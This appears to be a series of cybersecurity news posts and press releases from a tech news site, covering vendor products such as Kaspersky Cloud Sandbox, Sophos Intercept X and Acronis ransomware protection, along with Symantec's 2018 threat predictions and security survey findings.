With Kaspersky Cloud Sandbox, advanced detection and forensic capabilities are available as a service within the Kaspersky Threat Intelligence Portal, allowing cybersecurity teams to ensure they meet their budget requirements while also benefitting from advanced technology.

The service enables cybersecurity teams and security operations center (SOC) specialists to obtain deep insights into malware behavior and design, detecting targeted cyberthreats that were not identified in the wild.

Advanced anti-evasion techniques: revealing a hidden truth

To lure malware into revealing its harmful potential, sandbox technology performance should possess advanced anti-evasion techniques. A malicious program, developed to run in a certain software environment, will not explode on a ‘clean’ virtual machine, and will most probably destroy itself without a trace.

To avoid this, Kaspersky Cloud Sandbox applies the user’s various emulation techniques, such as Windows button clicking, document scrolling, special routine processes giving malware an opportunity to expose itself, the randomization of user environment parameters and many others.

Logging system: nothing gets missed in the noise

Once a piece of malware starts running its destructive activities, another innovative Kaspersky Cloud Sandbox technology comes to force: its logging subsystem intercepts malicious actions non-invasively.

When a Word document starts to behave suspiciously – for example, if it starts building a string in the machine memory, executing Shell commands, or dropping its payloads (all abnormal activities for a text document) – these events are registered in the Kaspersky Cloud Security logging subsystem.

It has extensive functionality able to detect a vast spectrum of malicious events including DLLs, registry key registration and modification, HTTP and DNS requests, file creation, deletion and modification etc. The customer is then provided with a full report containing data visualization graphs and screenshots, as well as a readable sandbox log.

Detection and incident response performance: second to none

Kaspersky Cloud Sandbox detection performance is backed up with big data of real-time threat intelligence from Kaspersky Security Network (KSN), providing customers with immediate status on both known and new threats discovered in the wild.

Advanced behavioral analysis based on more than 20 years of Kaspersky Lab threat research experience of fighting the most complex threats, allows customers to detect previously unseen malicious objects.

[adrotate group=”2″]

As well as getting advanced detection capabilities, SOC experts and researchers can amplify their incident response activities with other services available through the Kaspersky Threat Intelligence Portal.

When performing digital forensics or an incident response, a cybersecurity officer can receive the latest detailed threat intelligence about URLs, domains, IP addresses, file hashes, threat names, statistical/behavior data and WHOIS/DNS data, and then link that knowledge to the IOCs generated by the sample that was analyzed within the cloud sandbox.

APIs to automate its integration into customer security operations are also available, allowing cybersecurity teams to boost their incident investigations in a matter of minutes.

Go Back To > News | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

 

Sophos Intercept X with Predictive Protection Explained!

Sophos today announced the availability of Intercept X with malware detection powered by advanced deep learning neural networks. Join us for a briefing by Sumit Bansal, Sophos Managing Director for ASEAN and Korea!

 

Sophos Intercept X with Predictive Protection

Combined with new active-hacker mitigation, advanced application lockdown, and enhanced ransomware protection, this latest release of the Sophos Intercept X endpoint protection delivers previously unseen levels of detection and prevention.

Deep learning is the latest evolution of machine learning. It delivers a massively scalable detection model that is able to learn the entire observable threat landscape. With the ability to process hundreds of millions of samples, deep learning can make more accurate predictions at a faster rate with far fewer false-positives when compared to traditional machine learning.

This new version of Sophos Intercept X also includes innovations in anti-ransomware and exploit prevention, and active-hacker mitigations such as credential theft protection. As anti-malware has improved, attacks have increasingly focused on stealing credentials in order to move around systems and networks as a legitimate user, and Intercept X detects and prevents this behavior.

Deployed through the cloud-based management platform Sophos Central, Intercept X can be installed alongside existing endpoint security software from any vendor, immediately boosting endpoint protection. When used with the Sophos XG Firewall, Intercept X can introduce synchronized security capabilities to further enhance protection.

 

New Sophos Intercept X Features

Deep Learning Malware Detection

  • Deep learning model detects known and unknown malware and potentially unwanted applications (PUAs) before they execute, without relying on signatures
  • The model is less than 20 MB and requires infrequent updates

Active Adversary Mitigations

  • Credential theft protection – Preventing theft of authentication passwords and hash information from memory, registry, and persistent storage, as leveraged by such attacks as Mimikatz
  • Code cave utilization – Detects the presence of code deployed into another application, often used for persistence and antivirus avoidance
  • APC protection – Detects abuse of Application Procedure Calls (APC) often used as part of the AtomBombing code injection technique and more recently used as the method of spreading the WannaCry worm and NotPetya wiper via EternalBlue and DoublePulsar (adversaries abuse these calls to get another process to execute malicious code)

New and Enhanced Exploit Prevention Techniques

[adrotate group=”2″]
  • Malicious process migration – Detects remote reflective DLL injection used by adversaries to move between processes running on the system
  • Process privilege escalation – Prevents a low-privilege process from being escalated to a higher privilege, a tactic used to gain elevated system access

Enhanced Application Lockdown

  • Browser behavior lockdown – Intercept X prevents the malicious use of PowerShell from browsers as a basic behavior lockdown
  • HTA application lockdown – HTML applications loaded by the browser will have the lockdown mitigations applied as if they were a browser

Go Back To > Events | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

FREE Acronis Ransomware Protection For All!

The world is under siege by ransomware attacks. Ransomware don’t just put our personal data at risk, they are a serious threat to critical services and even national security. Therefore, we are elated to learn about the new Acronis Ransomware Protection – a free, standalone app that will protect us against ransomware.

 

The Ransomware Threat

Ransomware remains a silent destroyer of data for users worldwide. New strains of ransomware can easily bypass traditional anti-virus software to encrypt user data.

According to a ransomware survey conducted by Acronis earlier this month, 57.5% of the respondents still don’t know that ransomware can wipe their files and disable computer. Only 9.2% of the respondents heard about the WannaCry or NotPetya attacks last year, and 37.4% report that they don’t know how to protect their data or choose to do nothing.

These findings demonstrate a need for an easy, universal ransomware protection solution, and 55.5% of the survey respondents said that they would use one if it was free.

 

Acronis Ransomware Protection

Acronis Ransomware Protection is designed to stop ransomware attacks in real-time, and help users recover their data without paying any ransom. It is compatible with all popular backup and anti-virus programs, and provides an additional level of defense.

In event of a ransomware attack, Acronis Ransomware Protection blocks the malicious process and notifies the user with a popup. If any files were damaged in the attack, it facilitates the instant recovery of those affected files.

Acronis Ransomware Protection also comes with a cloud backup capability, allowing users to protect important files not only from ransomware, but also from hardware failure, natural disasters and other causes of data loss. Every user receives 5 GB of free Acronis Cloud storage.

Easy to install, Acronis Ransomware Protection is essentially a “set it and forget it” protection solution. The lightweight program (only 20 MB in size) requires limited system resources, which means it can run quietly in the background without affecting system performance.

 

Acronis Active Protection

Acronis Ransomware Protection is based on the Acronis Active Protection technology, that monitors system processes in real time, and uses unique behavioural heuristics to detect a ransomware attack.

[adrotate group=”2″]

These heuristics are constantly being improved by machine learning models, that are generated by analysing hundreds of thousands of malicious and legitimate processes in the Acronis Cloud AI infrastructure.

According to Acronis, this AI-based training is “tremendously effective” in defeating all ransomware strains, including zero-day attacks that signature-based solutions cannot detect.

 

Downloading Acronis Ransomware Protection

Acronis Ransomware Protection is currently available only for the Microsoft Windows operating system. Head over to its official page for the FREE download.

Go Back To > News | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky Lab Protection For Household 2.0 Revealed!

Kaspersky Lab is not letting their woes with the US Department of Homeland Security detract them from their core business of protecting consumers against cyberthreats. That was the message they conveyed when they presented the Kaspersky Lab protection options for Household 2.0.

 

Household 2.0

The modern home has changed. In the new era of Household 2.0 which consists of 2.4 people and 0.3 pets, there is an average of 6.3 connected devices per house! Yet, the Kaspersky Cybersecurity Index found that 39% of people are leaving their devices unprotected from cyberthreats like hacking, malware, financial fraud and more.

To protect these connected devices that play such a prominent role in Household 2.0, Kaspersky Lab is introducing updated versions of Kaspersky Internet Security and Kaspersky Total Security.

 

Kaspersky Lab Protection For Household 2.0

The updated Kaspersky Internet Security and Kaspersky Total Security come with anti-phishing technology to prevent users from falling victim to fake or spam emails, fake websites and fraud.

In addition, the updated URL Advisor tells a user whether a link in the search engine leads to a trusted, suspicious, dangerous or phishing website, or a website that may cause their computer harm, via a special indicator close to each link.

Many people are also worried about ransomware and the loss of their digital memories. To give them peace of mind, the new Kaspersky Internet Security and Kaspersky Total Security have updated anti-ransomware features.

Protecting your mobile devices is the new App Lock feature for Android. You can now protect specific apps like instant messaging services, social media or email accounts with a secret code. You can also use the Kaspersky Secure Connection service to encrypt your network traffic whenever you use a public or insecure Wi-Fi network.

Children are also increasingly connected to the Internet. To protect them, parents can use Kaspersky Safe Kids parental controls in Kaspersky Total Security to set time limits, restrict applications and prevent access to pages with adult content, obscene language or information on drugs and weapons.

 

The 2018 Kaspersky Lab Product Price List

Products One Device Three Devices Five Devices
Kaspersky Total Security RM 109 / ~US$ 27 RM 199 / ~US$ 49 NA
Kaspersky Internet Security RM 100 / ~US$ 24 RM 179 / ~US$ 44 RM 249 / ~US$ 68
Kaspersky Anti-Virus RM 39.90 / ~US$ 9.70 RM 119 / ~US$ 29 RM 199 / ~US$ 49

Here are some Amazon purchase links :

 

The Kaspersky Think Security Campaign

In conjunction with the announcement of the new Kaspersky Lab protection fo household 2.0, Techlane Resources, the Kaspersky Lab distributor in Malaysia, announced the Kaspersky Think Security Campaign.

You can now purchase Kaspersky Internet Security 3 Devices 1 Year at RM 179 / US$ 44 and get the following Kaspersky products absolutely FREE :

[adrotate group=”2″]
  • Kaspersky Internet Security 1 Device 1 Year,
  • Kaspersky Internet Security for Mac 1 Year, and
  • Kaspersky Internet Security for Android 1 Device 1 Year

You can also purchase Kaspersky Anti-virus 1 Device 1 Year at RM39.90 / ~US$ 9.70 and get the following Kaspersky products absolutely FREE :

  • Kaspersky Anti-Virus 1 Device 1 Year,
  • Kaspersky Internet Security for Mac 1 Year, and
  • Kaspersky Internet Security for Android 1 Device 1 Year

Go Back To > Events | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Symantec 2018 Cybersecurity Predictions

David Rajoo, Director of Systems Engineering, Symantec Malaysia, reveals the Symantec 2018 Cybersecurity Predictions. They will help CIOs and cybersecurity experts prepare for the onslaught of cybersecurity threats in 2018.

 

The Symantec 2018 Cybersecurity Predictions

This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

Gear up for a busy year ahead. Incidents like the WannaCry attack, which impacted more than 200,000 computers worldwide in May, are just the warmup to a new year of more virulent malware and DDoS attacks. Meanwhile, cyber criminals are poised to step up their attacks on the millions of devices now connected to the Internet of Things both in offices and homes.

The cybersecurity landscape in 2018 is sure to surprise us in ways that we never imagined. As 2017 draws to a close, here is what you can expect over the course of the upcoming year:

 

The Symantec 2018 Cybersecurity Predictions Part 1/3

Blockchain Will Find Uses Outside Of Cryptocurrencies But Cyber criminals Will Focus On Coins and Exchanges

Blockchain is finally finding applications outside of crypto-currencies, expanding its functions in inter-bank settlements with the help of IoT gaining traction. However, these use cases are still in their infancy stage and are not the focus for most cyber criminals today.

Instead of attacking Blockchain technology itself, cyber criminals will focus on compromising coin-exchanges and users’ coin-wallets since these are the easiest targets, and provide high returns. Victims will also be tricked into installing coin-miners on their computers and mobile devices, handing their CPU and electricity over to cyber criminals.

 

Cyber criminals Will Use Artificial Intelligence (AI) & Machine Learning (ML) To Conduct Attacks

No cyber security conversation today is complete without a discussion about AI and ML. So far, these conversations have been focused on using these technologies as protection and detection mechanisms. However, this will change in the next year with AI and ML being used by cyber criminals to conduct attacks.

It is the first year where we will see AI versus AI in a cybersecurity context. Cyber criminals will use AI to attack and explore victims’ networks, which is typically the most labour-intensive part of compromise after an incursion.

Next Page > The Symantec 2018 Cybersecurity Predictions Part 2/3

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Symantec 2018 Cybersecurity Predictions Part 2/3

Supply Chain Attacks Will Become Mainstream

Supply chain attacks have been a mainstay of the classical espionage and signals-intelligence operators, compromising upstream contractors/systems/companies and suppliers. They are proven to have a high-level of effectiveness, with nation-state actors using a mix of human intelligence to compromise the weakest link in the chain.

These attacks are moving into the cybercriminal space, becoming mainstream. With publicly available information on suppliers, contractors, partnerships and key-people, cyber criminals can find victims in the supply chain and attack the weakest link. With a number of high profile successful attacks in 2016 and 2017, cyber criminals will focus on this method in 2018.

 

File-less and File-light Malware Will Explode

2016 and 2017 have seen consistent growth in the amount of file-less and file-light malware, with attackers capitalising organizations that lack in preparation against such threats. With fewer Indicators of Compromise (IoC), use of the victims’ own tools, and complex disjointed behaviours, these threats have been harder to stop, track and defend against in many scenarios.

Like the early days of ransomware, where early success by a few cyber criminals triggered a gold-rush like mentality, more cyber criminals are now rushing to use these same techniques. Although file-less and file-light malware will still be outnumbered by orders-of-magnitude as traditional style malware, they will pose a significant threat and lead to an explosion in 2018.

[adrotate group=”1″]

 

Organisations Will Still Struggle With Security-as-a-Service (SaaS) Security

Adoption of SaaS continues to grow at an exponential rate as organizations embark on digital transformation projects to drive business agility. This rate of change and adoption presents many security challenges as access control, data control, user behaviour and data encryption vary significantly between SaaS apps. While this is not new and many of the security problems are well understood, organizations will continue to struggle with all these in 2018.

Combined with new privacy and data protections laws adopted by regulators across the world, these will pose major implications in terms of penalties, and more importantly, reputational damage.

 

Organisations Will Still Struggle With Infrastructure-as-a-Service (IaaS) Security – More Breaches Due to Error, Compromise & Design

IaaS has completely changed the way organisations run their operations, offering massive benefits in agility, scalability, innovation and security. It also introduces significant risks, with simple errors that can expose massive amount of data and take down the entire system.

While security controls above the IaaS layer are customer’s responsibility, traditional controls do not map well – leading to confusion, errors and design issues with ineffective or inappropriate controls being applied, while new controls are ignored. This will lead to more breaches throughout 2018 as organizations struggle to shift their security programs to be IaaS effective.

Next Page > The Symantec 2018 Cybersecurity Predictions Part 3/3

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Symantec 2018 Cybersecurity Predictions Part 3/3

Financial Trojans Will Still Account For More Losses Than Ransomware

Financial Trojans were some of the first pieces of malware to be monetised by cyber criminals. From simple beginnings as credential harvesting tools, they have since evolved to advanced attack frameworks that target multiple banks, and banking systems that send shadow transactions and hide their tracks. They have proven to be highly profitable for cyber criminals.

Today the move to mobile application-based banking has curtailed some of the effectiveness, so cyber criminals are now moving their attacks to these platforms. Cyber criminals’ profits from Financial Trojans is expected to grow, giving them higher gains as compared to Ransomware attacks.

 

Expensive Home Devices Will Be Held To Ransom

Ransomware has become a major problem and is one of the scourges of the modern Internet, allowing cyber criminals to reap huge profits by locking up users’ files and systems. The gold-rush mentality has not only pushed more and more cyber criminals to distribute ransomware, but also contributed to the rise of Ransomware-As-A-Service and other specializations in the cyber criminal underworld.

These specialists are now looking to expand their attack reach by exploiting the massive increase in expensive connected home devices. Smart TVs, smart toys and other smart appliances can run into thousands of dollars and users are generally not aware of the threats to these devices, making them an attractive target for cyber criminals.

[adrotate group=”1″]

 

IoT Devices Will Be Hijacked and Used in DDoS Attacks

In 2017, we have seen massive DDoS attacks using hundreds of thousands of compromised IoT devices in people’s homes and workplaces to generate traffic. This is not expected to change with cyber criminals looking to exploit the poor security settings and management of home IoT devices.

Furthermore, the inputs and sensors of these devices will also be hijacked, with attackers feeding audio, visual or other faked inputs to make these devices do what they want rather than what users expect them to do.

 

IoT Devices Will Provide Persistent Access to Home Networks

Beyond DDoS attacks and ransomware, home IoT devices will be compromised by cyber criminals to provide persistent access to a victim’s network. Home users generally do not consider the cyber security implications of their home IoT devices, leaving default settings and not vigilantly updating them like they do with their computers.

Persistent access means that no matter how many times a victim cleans their machine or protects their computer, the attacker will always have a backdoor into victims’ network and the systems that they connect to.

Go Back To > First PageArticles | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Palo Alto Networks : Not Enough Cybersecurity Staff In Healthcare

Palo Alto Networks revealed that despite an increase in cybersecurity budgets, there is a lack of dedicated cybersecurity staff in the healthcare industry.

 

Palo Alto Networks : Not Enough Cybersecurity Staff In Healthcare

SINGAPORE, 29 November 2017 – As the adoption of digital technology in the healthcare industry accelerates, there is an increasing need to protect another side of patients’ and healthcare organisations’ well-being – the security of their personal data. This emphasis on protecting data and mitigating cyberthreats is reflected in the industry’s significant investment into cybersecurity.

According to a recent survey * by Palo Alto Networks, about 70 percent of healthcare organisations in Asia-Pacific say that 5 to 15 percent of their organisation’s IT budget is allocated to cybersecurity.

The survey was conducted amongst more than 500 business professionals in APAC, covering Australia, China, Hong Kong, India and Singapore markets.

However, despite substantial budgets, there seems to be a need for the healthcare industry to catch-up with industry peers in terms of cybersecurity talent, with only 78 percent having a team in their organisations dedicated to IT security, the lowest among other industries surveyed. This is also well-below the industry-wide average of 86 percent.

 

Risk factors

Aside from monetary loss associated with data breaches and availability of connected devices which monitor patient lives, healthcare professionals are most worried about the loss of clients’ contacts, financial or medical information – 30 percent have cited loss of details as key. Fear of damaging the company’s reputation among clients comes next at 22 percent, followed by 17 percent citing company downtime while a breach is being fixed as a concern.

Cybersecurity risks in healthcare organisations are also amplified with BYOD (Bring Your Own Device), with 78 percent of organisations allowing employees to access work-related information with their own personal devices such as their mobile phones and computers. In addition to this, 69 percent of those surveyed say they are allowed to store and transfer their organisation’s confidential information through their personal devices.

While 83 percent claimed there are security policies in place, only 39 percent admit to reviewing these policies more than once a year – lower than the 51 percent of respondents from the finance industry, a sector also known to hold sensitive client data.

[adrotate group=”1″]

 

Call to get in shape for the future

As more healthcare organisations fall prey to cyberattacks, such as ransomware, a lapse in data security is a real threat to the industry, hence organisation-wide education and awareness are crucial towards ensuring that the right preventive measures are implemented and enforced.

54 percent of the respondents have cited an inability to keep up with the evolving solutions being a barrier to ensuring cybersecurity in their organisations, and 63 percent of respondents attributed this to an ageing internet infrastructure as the likely main reason for cyberthreats, should they happen.

 

Palo Alto Networks Tips For Healthcare Organisations

Here are some tips for healthcare organisations:

  • Ensure that medical devices are equipped with up-to-date firmware and security patches to address cybersecurity risks. Medical devices are notoriously vulnerable to cyberattacks because security is often an afterthought when the devices are designed and maintained by the manufacturer. These precautionary measures may include having an inventory on all medical devices, accessing network architecture and determining patch management plan for medical devices, as well as developing a plan to migrate medical devices to the medical device segment.
  • Apply a zero trust networking architecture for hospital networks, making security ubiquitous throughout, not just at the perimeter. Healthcare organisations should look to segment devices and data based on their risk, inspecting network data as it flows between segments, and requiring authentication to the network and to any application for any user on the network.
  • Practices such as BYOD and some employees’ ability to store and transfer confidential information through their personal devices put them at a higher risk of phishing attacks. To prevent this, healthcare providers should ensure that staff undergo regular end-user security training to reduce successful phishing. Cybersecurity best practices can be taught as a new hire class for every employee.
  • As healthcare organisations migrate portions of their critical infrastructure and applications to the cloud, it becomes imperative for an advanced and integrated security architecture to be deployed to prevent cyberattacks on three-prongs: the network, the endpoint and the cloud. Traditional antivirus will not be effective in guarding against advanced malware such as ransomware which continuously changes to avoid detection.

Go Back To > News | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Trend Micro Red Code 2017 Key Takeaway Points

At the side of Trend Micro Red Code 2017, Trend Micro and Cyber Security Malaysia gave us a briefing on the key takeaway points from the cybersecurity conference.

The Trend Micro team comprised of Goh Chee Hoh (Trend Micro Malaysia Managing Director). Ryan Flores (Senior Manager, Future Threat Research, Trend Micro AP) and Law Chee Wan (Technical Sales, Trend Micro Malaysia). Cyber Security Malaysia was represented by Dr. Aswami Ariffin (Senior VP, CyberDEF@CSRS).

 

The Trend Micro Red Code 2017 Key Takeaway Points

Cybersecurity Best Practices

  • Keep legacy systems and current secure: There are organizations still using Windows XP, Vista, or 7, for all of which Microsoft has ended support. This means there will no longer be security patches or updates anymore, leaving these systems vulnerable to cyberattacks. The recommendation is to quickly move to a new system or keep the current ones secure with third-party security software.
  • Protect data storage systems: Wherever data is – on-premise, cloud, or in virtualized or hybrid environments – it has to be protected.
  • Detect/prevent breaches: Targeted attacks can breach your organization without ever alerting traditional early warning and defense systems. Fail to spot an incursion, and you could be hit with industry fines, reputation damage and legal costs.
  • Protect information on endpoints: Your organization could have information residing on mobile devices, laptops, and multiple virtual and physical endpoints. The more endpoints, the greater the risk surface.
  • Data encryption: Encrypted data are “useless” to a hacker without the decryption key. It is imperative to encrypt sensitive data for both those in transit and those at rest.
  • Backup of data: It is extremely important to have backups of consumer data. In an event where a breach happens and all information is stolen or encrypted by the hacker, at the very least an organization would still have the backups to carry on daily service, while trying to resolve the issue.
  • Frequent assessments: Regular “checkups” on the capabilities of the system as well as the knowledge and education of employees is important. Trend Micro offers server assessments and also recommends that the people within the organization also be assessed via methods such as sending out test “phishing” emails.

 

Cybersecurity Awareness

  • Cybersecurity awareness programs help get employees up to speed with the latest attacks, safe internet practices, security policies, and how to spot a security threat.
  • Within an organization, there must be security policies governing the use of data and access to certain systems and programs.

 

Multi-Layered Security

To mitigate the risk of infection as effectively as possible, organizations to take a layered approach to security – from the gateway to the network, server and endpoint.

  1. Email and Web Gateway Protection
    This will give a good chance of preventing most ransomware from reaching your users – whether that’s via a phishing email or a malicious website.[adrotate group=”2″]
  1. Endpoint Security
    For a small percentage of ransomware threats that might make it through the web/email gateway protection, endpoint security will monitor for suspicious behavior, enforces application whitelists and features vulnerability shielding to protect against unpatched vulnerabilities that ransomware often takes advantage of.
  1. Network Defense
    This layer guards against ransomware that spreads into the organization via network protocols.
  1. Server Protection
    This is where most of the organization’s critical enterprise data will reside. It is essential to ensure any unpatched vulnerabilities are protected from ransomware via virtual patching, through a security solution which can monitor for lateral movement and file integrity.

Go Back To > Events | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Get The New Acronis Backup 12.5 Today!

June 1, 2017: Acronis today announced the latest release of Acronis Backup 12.5. The new Acronis Backup 12.5 comes in two editions: Standard and Advanced, with an easy in-place upgrade.

Acronis Backup 12.5 allows businesses to start small with Acronis Backup 12.5 Standard edition and scale to Acronis Backup 12.5 Advanced when necessary, simply by changing license keys. This also gives Acronis partners the flexibility to meet the needs of small and large businesses with the same product.

Acronis Backup 12.5 also brings down the cost down by as much as 30 percent, compared to its competitors.

 

New Features in Acronis Backup 12.5 Advanced edition

Building upon the existing ease of use, reliability, and new hybrid cloud architecture of Acronis Backup 12, the new advanced functionality creates a powerful, feature-rich solution that supports more than 20 platforms.

These include Windows, Office 365, Azure, Linux, Mac OS X, Oracle, VMWare, Hyper-V, Red Hat Virtualization, Linux KVM, Citrix XenServer, iOS and Android:

  • Unified web interface for the entire infrastructure
  • Admin roles and delegations for distributed infrastructures
  • Support for six hypervisors to provide migration platform options
  • Bare-metal recovery automation and remote boot media control to reduce RTO of remote site recovery
  • SAN storage snapshots to reduce hypervisor resource utilization
  • Oracle backup and granular recovery
  • Advanced tape support for increased granularity and simplified management
  • Advanced reporting for detailed insights and corporate compliance
  • Disaster recovery capability for emergency data recovery locally and in the cloud
  • Backup validation process ensures recoverability
  • Acronis Notary to ensure the authenticity of data

 

New Features in both Standard and Advanced editions

Businesses of all sizes will benefit from more than 170 advancements common to both editions, addressing today’s hybrid cloud environment and setting Acronis apart from the competition. Highlights include:

  • Customizable dashboards for quick insights into the backup infrastructure
  • Acronis Active Protection to stop ransomware attacks
  • Acronis Instant Restore for 15-second RTOs
  • Acronis vmFlashback for quick incremental recovery of virtual machines

 

A New Generation of Data Protection

More than 500 Acronis engineers globally are engaged in the innovation and development of Acronis Backup 12.5 Standard and Advanced editions. As a result, Acronis added private and public cloud support for backing up and migrating workloads as well as reliable cloud storage.

The release delivers the industry’s first and only data protection against ransomware with automated restoration of damaged data.

[adrotate group=”2″]

Acronis Backup 12.5 also introduces new technology that enables users to verify the backup integrity before its restoration, improving regulatory compliance and data integrity with blockchain.

  • Backup of Amazon EC2 instances, Microsoft Azure VMs and Office 365 mailboxes
  • Acronis Active Protection to intelligently detect and block ransomware attacks, such as WannaCry, with instant restoration of any compromised data
  • Acronis Notary to prove a file is authentic and unchanged since it was backed up

Go Back To > News | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Sophos CryptoGuard Anti-Ransomware Protection Launched!

April 25, 2017 – Sophos (LSE:SOPH) today announced that its next-generation anti-ransomware CryptoGuard technology is now available with its Sophos Server Protection products.

With this optimisation, Sophos Server Protection now has signature-less detection capabilities to combat ransomware – similar to Sophos Intercept X for endpoints. In September 2016, Sophos launched Sophos Intercept X with CryptoGuard, which stop the spontaneous encryption of data by ransomware within seconds of detection.

 

Sophos CryptoGuard

By adding CryptoGuard to server security, Sophos is closing a critical gap by preventing ransomware attacks that could come in through rogue, guest or remote access users or other weaknesses in a company’s network. For example, if a company allows bring-your-own-laptops on the network, remote access for employees or is victimised by an insider cyber threat, servers become highly susceptible to ransomware.

Additionally, network shares on servers are high-value targets as they contain proprietary financials, personally identifiable information and other key data, and should be protected as such.

“Servers are considered the jackpot for cybercriminals, since they can store confidential corporate and employee information, medical records with social security numbers or private customer documents. It would be devastating for organisations to lose this kind of sensitive data to ransomware,” said Dan Schiappa, senior vice president and general manager of Sophos’ Enduser and Network Security Groups. “Most organisations back-up their data, but recovery from a backup is not always easy. Businesses, schools or hospitals do not want the liability, hassle and operational disruption required to restore from a backup. Anti-ransomware technology is a critical layer for the protection and ongoing accessibility of the information that resides on servers. Sophos has optimised its Server Protection products with CryptoGuard, adding another layer of next-gen protection to block this pervasive and highly-damaging cyber threat.”

[adrotate banner=”4″]

Sophos has also expanded Synchronised Security by adding Sophos Security Heartbeat capabilities to Sophos Central Server Protection Advanced. By adding Security Heartbeat to servers, an IT administrator can now leverage Sophos XG Firewall to automatically isolate infected servers and endpoints to identify and respond to the source of compromises faster.

Sophos Central Server Protection also includes Malicious Traffic Detection, which monitors for traffic to Command and Control servers and application whitelisting with one-click Server Lockdown, which secures servers in a safe state and prevents unauthorised applications from running.

Sophos Server Protection products with CryptoGuard capabilities now includes Central Server Protection Advanced on the cloud-based Sophos Central platform and Sophos Server Protection Enterprise, which is managed with a traditional on-premise console.

Pricing for the complete range of Sophos Server Protection products is available from authorised Sophos Partners worldwide.

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Acronis True Image Leads Competition In Ransomware Protection

April 24, 2017 — Acronis today announced the latest product comparison report from MRG Effitas, a UK-based independent IT security research company that provides a range of efficacy assessment and assurance services. The report conclusively demonstrated that Acronis True Image 2017 New Generation is the most advanced consumer backup solution as measured by ransomware protection, performance, usability, and feature set.

 

Acronis True Image Leads Competition In Ransomware Protection

MRG Effitas compared Acronis True Image 2017 New Generation, CrashPlan Home 4.8.0, EaseUS TODO Backup Home 10.0, Genie Timeline Home 2016, IDrive 6.5.1.23, Macrium Reflect Home 6.3.1655, NovaBACKUP 18.5 Build 926, and Paragon Backup and Recovery 16. The result was a comprehensive 2017 report entitled “MRG Effitas Comparative Assessment of Data Protection/Backup Products on Protection, Performance, and Usability.”

The report singled out Acronis True Image 2017 as the only solution that protected data against every assessed ransomware threat, thanks to the innovative Acronis Active Protection technology released earlier this year.

“Among all the products we tested, only Acronis True Image 2017 New Generation was able to protect the backups from every ransomware family tested,” states the report’s final conclusion. “The other solutions have basically zero backup protection when it comes to ransomware… Based on the tests, only Acronis’s backup file is protected against the tested ransomware.”

[adrotate banner=”4″]

“Ransomware currently represents a significant risk to end users, businesses and government institutions. Anti-malware technologies can’t provide 100 percent protection against this class of threat. What this test shows is that anyone relying on a backup solution to mitigate against the risks imposed by ransomware if their anti-malware technology fails should not just assume that it will be effective without independent, third party verification.” Chris Pickard, CEO of MRG Effitas.

That’s not the only finding that pointed to the Acronis solution as the optimal choice. According to MRG Effitas, Acronis True Image 2017 also came first in 18 of 24 performance test and when it didn’t win, it finished second.

“These results confirm our internal testing,” said John Zanni, CMO of Acronis. “Acronis True Image is the fastest home backup on the market and the only product that is able to protect itself, and the data, from ransomware. The same anti-ransomware technology is currently being rolled out across the full range of our business products and we’ll continue to invest in R&D, making data protection fast, easy, complete — for everybody.”​

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Acronis True Image 2017 New Generation Launched!

January 19, 2017 – Acronis, a global leader in hybrid-cloud data protection and storage, today announced Acronis True Image 2017 New Generation with Acronis Active Protection — active protection against ransomware attacks on user data, Acronis Notary — blockchain-based data certification and verification capabilities — and Acronis ASign — the most consumer-friendly electronic document signing service.

Acronis True Image is the first and only backup solution in the market that introduces Active Protection technology to detect and prevent ransomware attacks in real-time, automatically recover all data from the backup, self-protect backups and the backup application.

According to the FBI, damages from ransomware exceeded $1 billion in 2016 and are growing at an alarming rate, affecting thousands of people every day. This year, cyber-attacks will increasingly threaten data on every personal computer and Acronis delivers the ultimate protection for user data.

Acronis True Image is the fastest and most complete personal backup solution, outperforming the closest competition by more than two times and protecting data on Windows and Mac computers, iOS and Android mobile devices, and Facebook social network accounts. Acronis True Image delivers ultimate data protection for personal and family data using AES 256 encryption and stores it in multiple destinations, including external drives, NAS devices, network shares, and the secure Acronis Cloud.

 

Acronis True Image 2017 New Generation

Acronis True Image 2017 New Generation is the most secure backup on the market due to new unique data protection capabilities:

  • Acronis Active Protection for real-time active protection against ransomware. Acronis Active Protection identifies unusual activity on computers and prevents malicious applications from damaging user data, backups, and backup software. Cutting-edge behavioral heuristics detect and prevent new and known ransomware attacks, making the backup more secure, and reducing a number of times data need to be restored from the backup.
  • Acronis Notary for Blockchain-based data authentication. Acronis Notary offers certification of the content of any file and verification of content modifications against the original version. Unique, “digital file fingerprints” are stored in a distributed, immutable database based on blockchain technology. Blockchain allows users to verify the authenticity of the information at any time. This is especially important for valuable documents such as contracts, medical records, and financial documents.
